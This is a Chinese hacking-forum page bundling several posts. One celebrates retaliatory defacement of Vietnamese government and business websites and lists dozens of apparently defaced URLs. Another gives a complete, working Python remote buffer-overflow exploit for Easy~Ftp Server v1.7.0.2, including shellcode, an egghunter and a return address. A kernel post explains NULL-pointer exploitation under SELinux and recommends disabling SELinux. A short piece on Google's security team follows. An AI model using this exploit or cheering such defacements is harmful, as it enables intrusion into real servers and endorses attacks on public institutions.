返回列表 发帖

来而不往非礼也

事件回顾,近日越南在中国南海叫嚷,接与其他国家商业联盟为靠山非法开采资源。
直至2日早上收到中国部分政府站点遭到越南黑客攻击,

国内多家地方政府网站遭黑客攻击,被入侵网站标有“越南黑客是第一”,“越南人民愿意牺牲来保护海洋,天空和国家”等挑衅言论。

网站遭越南黑客入侵后截图

6月2日,有网友向站长之家反映其所在地政府网站遭遇疑似越南黑客的攻击,据了解,该黑客自称“Mr.N – Cubi11”,他在入侵我国地方政府网站后,还在网站中发表留言,叫嚣“越南黑客是第一”,“越南人民愿意牺牲来保护海洋,天空和国家”。

网站遭越南黑客入侵后截图

该网友还向站长之家表示,据他的了解,国内还有多家政府网站也遭到越南黑客入侵,疑似一大批越南黑客正向中国网站发起攻击。








目前直至截稿前,已经统计了有以下越南站点被天朝人们··你们懂的,至于那些尚未统计的还有很多很多。。。。

只能说中国人民是强大的,围观
http://www.vienlien.com.vn/uploads/1.txt
http://www.vietnam.gov.vn
http://www.quantri.com.vn/indeex.htm
http://www.tayho.gov.vn/tin_tuc_quan/tthc/images_tt/file/1.txt
ftp://203.162.1.102/yuenancaonim.html
http://www.duhocthuysi.vn/xk.html
http://www.ibgroup.vn/xk.html
http://www.ranaqua.com/xk.html
http://www.tayho.gov.vn/tin_tuc_quan/tthc/images_tt/file/1.txt
ftp://203.162.1.102/yuenancaonima.html
http://www.duhocthuysi.vn/xk.html
http://www.ibgroup.vn/xk.html
http://www.ranaqua.com/xk.htm
ftp://www.lifeweek.com.cn/yuenancaonima.html
http://www.baoveyenviet.com/xk.htm
http://www.londonvietnam.com/xk.html
http://www.dncustoms.gov.vn/sbyuenan.html
http://www.duhocthuysi.vn/xk.html
http://vinhlong.mard.gov.vn/index.html
http://www.baoveyenviet.com/xk.html
http://www.londonvietnam.com/xk.html
http://www.dncustoms.gov.vn/sbyuenan.html
http://www.duhocthuysi.vn/xk.html
http://vinhlong.mard.gov.vn/index.html
http://www.ppd.gov.vn/index.html
http://phunu.agroviet.gov.vn/index.html
http://www.vnast.gov.vn/index.html
http://mne.mard.gov.vn/index.html
http://tichhop.mard.gov.vn/index.html
http://bvtv.ppd.gov.vn/index.html
http://www.chebien.gov.vn/index.html
http://phathanh.mard.gov.vn/index.html
http://kehoach.agroviet.gov.vn/index.html
http://antoanlaodong.chebien.gov.vn/index.html
http://antoanlaodong.chebien.gov.vn/index.html
http://vinhlong.mard.gov.vn/index.html
http://phunu.agroviet.gov.vn/index.html
http://www.cuoihoidongphuong.com.vn/index.html
http://fsiu.mard.gov.vn/index.html
http://vukehoach.mard.gov.vn/index.html
http://WWW.GIONGCAYTRONG.GOV.VN/index.html
http://giongcaytrong.gov.vn/index.html
http://www.phuonghoapham.vn/index.html
http://phuonghoapham.vn/index.html
http://grpi.agroviet.gov.vn/index.html
http://pvpo.mard.gov.vn/index.html
http://mic.mard.gov.vn/index.html
http://www.pgrvietnam.org.vn/index.html
http://www.thoanhviet.vn/index.html
http://icd.mard.gov.vn/index.html
http://mis.agroviet.gov.vn/index.html
http://langnghe.chebien.gov.vn/index.html
http://demomic.mard.gov.vn/index.html
http://www.ccfsc.gov.vn/index.html
http://ccfsc.mard.gov.vn/index.html
http://vinhlong.agroviet.gov.vn/index.html
http://gms.mard.gov.vn/index.html
http://vietnam.gms-ain.org/index.html
http://xttmnew.agroviet.gov.vn/index.html
http://xttm.agroviet.gov.vn/index.html
http://www.isgmard.org.vn/index.html
http://law.mard.gov.vn/index.html
http://nuocsach.mard.gov.vn/index.html
http://www.digiland.com.vn/index.htm

http://renovationsoft.com/index.htm

http://reno-dental.com/index.htm

http://www.dostquangtri.gov.vn/index.htm

http://ausp.edu.vn/Administrator/upload/index.htm








 

您可能还想看的主题:

linux下apache web server

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

EasyFtp-Server-v1.7.0.2远程溢出Exploit
# Exploit Title: Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
# Date: 18-02-2010
# Author: ThE g0bL!N
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Code :
#!/usr/bin/python
import sys
import socket
import base64
  
if len(sys.argv) != 4:
print "
****************************************************"
print "
  • Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit
    "
  • print "
  • Usage : ./sploit.py <target_ip> <user> <password>
    "
  • print "
  • Example : ./sploit.py 192.168.1.3 anonymous w00t
    "
  • print "*****************************************************"
    sys.exit(0)
      
    user = sys.argv[2]
    pwd = sys.argv[3]
    auth = base64.b64encode(user+":"+pwd)
      
    # win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub
    shellcode=(
    "x44x7Ax32x37x44x7Ax32x37"
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
    "x42x50x42x30x42x30x4bx58x45x34x4ex43x4bx38x4ex47"
    "x45x30x4ax37x41x50x4fx4ex4bx58x4fx44x4ax41x4bx48"
    "x4fx45x42x52x41x30x4bx4ex49x44x4bx58x46x53x4bx58"
    "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"
    "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
    "x46x4fx4bx53x46x45x46x32x46x30x45x37x45x4ex4bx58"
    "x4fx45x46x42x41x30x4bx4ex48x56x4bx48x4ex30x4bx54"
    "x4bx58x4fx45x4ex41x41x50x4bx4ex4bx48x4ex51x4bx58"
    "x41x50x4bx4ex49x58x4ex35x46x32x46x50x43x4cx41x33"
    "x42x4cx46x56x4bx48x42x54x42x43x45x58x42x4cx4ax57"
    "x4ex50x4bx58x42x54x4ex50x4bx48x42x57x4ex51x4dx4a"
    "x4bx38x4ax56x4ax30x4bx4ex49x30x4bx38x42x48x42x4b"
    "x42x50x42x30x42x50x4bx48x4ax36x4ex53x4fx45x41x43"
    "x48x4fx42x46x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
    "x42x35x4ax56x50x57x4ax4dx44x4ex43x37x4ax56x4ax59"
    "x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x36x41x46"
    "x4ex36x43x36x42x50x5a")
      
    egghunter=(
    "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
    "xefxb8x44x7Ax32x37x8bxfaxafx75xeaxafx75xe7xffxe7")
      
    buf = "x61"*268
    buf += "xF0x69x83x7C" #CALL ESP XP SP3
    buf += "x63"*8
    buf += egghunter
      
    head = "GET /list.html?path="+buf+" HTTP/1.1
    "
    head += "Host: "+shellcode+"
    "
    head += "Authorization: Basic "+auth+"
    "
      
    try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],8080))
    s.send(head + "
    ")
    print "[x] Payload sended waiting for shellcode..."
    s.close()
    except:
    print "Error!"




















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    selinux&kernel 0day
    kernel NULL pointer的利用需要把shellcode映射到内存0处, 大家在测试exp的时候,总能发现一个规律, 开着selinux就能溢出成功, 关闭就不能溢出成功了。 看了下内核源码,终于搞清楚了: mmap在做匿名映射的时候,会经过LSM层来做安全验证, LSM初始化的时候,会将selinux作为它的第一验证模块, capablity作为它的第2验证模块。这2个模块在做mmap映射的时候,都指向了dummy_file_mmap_addr这个函数:
    usr/src/debug/kernel-2.6.18/linux-2.6.18.i686/security/dummy.c:

    static int dummy_file_mmap_addr (struct file *file, unsigned long reqprot,
    unsigned long prot,
    unsigned long flags,
    unsigned long addr,
    unsigned long addr_only)
    {
    if ((addr < mmap_min_addr) &amp;&amp; !capable(CAP_SYS_RAWIO))
    return -EACCES;
    return 0;
    }
    mmap_min_addr代表了用户能映射的最小内存地址, 它在/proc/sys/vm/mmap_min_addr进行设置。这里还要对当前进程的CAP_SYS_RAWIO能力做个判断, 就是说如果进程有这个能力的话, 不管mmap_min_addr的值是多大,都可以满足用户的需求, 当然就可以映射0地址了。 那么这跟selinux有什么关系呢? 进程在被执行的时候,尤其是调用了execve这个函数, 进程的权能是需要重新来计算的,在selinux开启的时候, selinux是LSM的第一验证模块, 看下它是怎么计算进程在被execve后的权能的:
    void cap_bprm_apply_creds (struct linux_binprm *bprm, int unsafe)
    {
    /* Derived from fs/exec.c:compute_creds. */
    kernel_cap_t new_permitted, working;

    new_permitted = cap_intersect (bprm->cap_permitted, cap_bset);
    working = cap_intersect (bprm->cap_inheritable,
    current->cap_inheritable);
    new_permitted = cap_combine (new_permitted, working);

    if (bprm->e_uid != current->uid || bprm->e_gid != current->gid ||
    !cap_issubset (new_permitted, current->cap_permitted)) {
    current->mm->dumpable = suid_dumpable;

    if (unsafe &amp; ~LSM_UNSAFE_PTRACE_CAP) {
    if (!capable(CAP_SETUID)) {
    bprm->e_uid = current->uid;
    bprm->e_gid = current->gid;
    }
    if (!capable (CAP_SETPCAP)) {
    new_permitted = cap_intersect (new_permitted,
    current->cap_permitted);
    }
    }
    }

    current->suid = current->euid = current->fsuid = bprm->e_uid;
    current->sgid = current->egid = current->fsgid = bprm->e_gid;

    /* For init, we want to retain the capabilities set
    * in the init_task struct. Thus we skip the usual
    * capability rules */
    if (current->pid != 1) {
    current->cap_permitted = new_permitted;
    current->cap_effective =
    cap_intersect (new_permitted, bprm->cap_effective);
    }

    /* AUD: Audit candidate if current->cap_effective is set */

    current->keep_capabilities = 0;
    }
    我们看到如果当前进程不是init进程的话, 权能还是会被继承下来的。

    在selinux关闭的时候, capabiliy模块成为了LSM的第一验证模块, 看下它是怎么计算的:
    static void dummy_bprm_apply_creds (struct linux_binprm *bprm, int unsafe)
    {
    if (bprm->e_uid != current->uid || bprm->e_gid != current->gid) {
    current->mm->dumpable = suid_dumpable;

    if ((unsafe &amp; ~LSM_UNSAFE_PTRACE_CAP) &amp;&amp; !capable(CAP_SETUID)) {
    bprm->e_uid = current->uid;
    bprm->e_gid = current->gid;
    }
    }

    current->suid = current->euid = current->fsuid = bprm->e_uid;
    current->sgid = current->egid = current->fsgid = bprm->e_gid;

    dummy_capget(current, &amp;current->cap_effective, &amp;current->cap_inheritable, &amp;current->cap_permitted);
    }

    static int dummy_capget (struct task_struct *target, kernel_cap_t * effective,
    kernel_cap_t * inheritable, kernel_cap_t * permitted)
    {
    *effective = *inheritable = *permitted = 0;
    if (!issecure(SECURE_NOROOT)) {
    if (target->euid == 0) {
    *permitted |= (~0 &amp; ~CAP_FS_MASK);
    *effective |= (~0 &amp; ~CAP_TO_MASK(CAP_SETPCAP) &amp; ~CAP_FS_MASK);
    }
    if (target->fsuid == 0) {
    *permitted |= CAP_FS_MASK;
    *effective |= CAP_FS_MASK;
    }
    }
    return 0;
    }
    注意看这行:
    *effective = *inheritable = *permitted = 0;
    selinux将当前进程的权能全部清0了, 所以excve后的普通进程是没有任何权能的。 也就没有了CAP_SYS_RAWIO权能,也就不能映射0内存了。 所以想阻止NULL pointer kernel 0day的攻击,最好把selinux关掉,或升级到最新的内核版本。 同时把mmap_min_addr的值设为大于4096。




















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    你知道吗:Google安全团队的幕后运作和全新战略
    <P align=center>  [/quote]
    网易科技讯 随着Web2.0技术对在线安全提出了新的挑战,作为Google公司的工程副总裁的Douglas Merrill所处的位置正是数字信息时代发展的临界期最前沿。Merrill领导着Google公司约由50人组成的安全团队。他的职责之一是确保网络应用软件的安全。
    Merrill说:“我们还不知道那些可以打破这些有趣而令人振奋的新互动网络应用软件的东西是什么,我们相信我们正徜徉在一门全新科学的最前沿。 我们必须在网络安全业界有所创新。”

    <P align=center>  [/quote]
    Merrill办公室的一个枕头说明了他非常喜欢狗。那个枕头上写着:“完全没有狗毛的设备是不存在的。”

    <P align=center> [/quote]
    在去年访问北京航空航天大学软件学院的时候,Merrill获得了这个证书。
    Merrill早年毕业于Tulsa大学,主修社交与政治组织学。后来,他还获得了普林斯顿大学心理学专业的硕士学位和博士学位。 Merrill第一次接触安全是在兰德智囊团,美国许多国家情报机关都是兰德智囊团的客户。

    <P align=center>  [/quote]
    这个Darth Vader的塑像是一次聚会后省下的东西,它象卫兵一样树立在Google公司安全团队的工作区外。安全团队的成员们这个《星球大战》中的大反派是Google安全团队的好朋友。

    <P align=center>  [/quote]
    它在活跃了办公室的气氛的同时,员工们也获得了创新的灵感,正如此处显示的Google的“Ye Mighty Guiding Principles(强大的指导方针)”,内容如下:
    1、实际上,这里根本没有任何规则。
    2、客户安全和愉悦是第一位的。
    3、它只是代码而已,我们可以改变它。
    4、我们效力于同一家公司。
    5、网络的可配置能力是无限的。
    6、不要讨论“政策”问题。
    7、这里没有“工作”的说法。
    8、计算机只能令你心碎。(三张)


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表